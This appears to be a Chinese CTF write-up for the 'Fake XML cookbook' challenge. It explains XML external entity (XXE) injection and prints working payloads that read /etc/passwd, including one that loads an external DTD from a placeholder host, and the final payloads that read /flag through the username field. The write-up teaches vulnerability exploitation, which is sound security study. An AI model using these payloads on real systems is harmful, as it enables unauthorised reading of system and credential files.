xml-xxe漏洞之Fake XML cookbook

知识点：

什么是xxe

五分钟了解什么是XXE漏洞

利用

XML漏洞_cjm.....的博客-CSDN博客_xml漏洞

XXE漏洞——XML外部实体注入(XML External Entity)

当应用是通过用户上传的XML文件或POST请求进行数据的传输，并且应用没有禁止XML引用外部实体，也没有过滤用户提交的XML数据，那么就会产生XML外部实体注入漏洞，即XXE漏洞

例1：

<?xml version="1.0"?><!DOCTYPE a [<!ENTITY b SYSTEM "file:///etc/passwd" >]><x>&b;</x>

如果以上xml代码被解析，则会返回/etc/passwd文件的内容。

例2：

<?xml version="1.0"?><!DOCTYPE a [<!ENTITY % d SYSTEM "http://xxx.com/xxe.dtd" >%d;]><x>&xxe;</x>

http://xxxx.com/xxe.dtd的内容为：

<!ENTITY xxe SYSTEM "file:///etc/passwd" >

有的小伙伴可能已经发现了，例1中实体名前面并没有%，而例2中实体名前是有%的，这里的区别在于，例1中定义的实体是通用实体，而例2中定义的是参数实体，并且参数实体只能在dtd中使用，即例2代码中的第三行 %d;，这里就像在外面引用统用实体一样，这里的%d;就引用了http://xxx.com/xxe.dtd这个文件到dtd中。

例3：

<?xml version="1.0"?><!DOCTYPE a SYSTEM "http://xxx.com/xxe.dtd"><x>&xxe;</x>

http://xxxx.com/xxe.dtd的内容为：

<!ENTITY xxe SYSTEM "file:///etc/passwd" >

这道题：

抓包：

直接上漏洞xml实体:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>
<user><username>&admin;</username><password>123456</password></user>

注意，实体是有模板的；

然后继续打开flag：

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>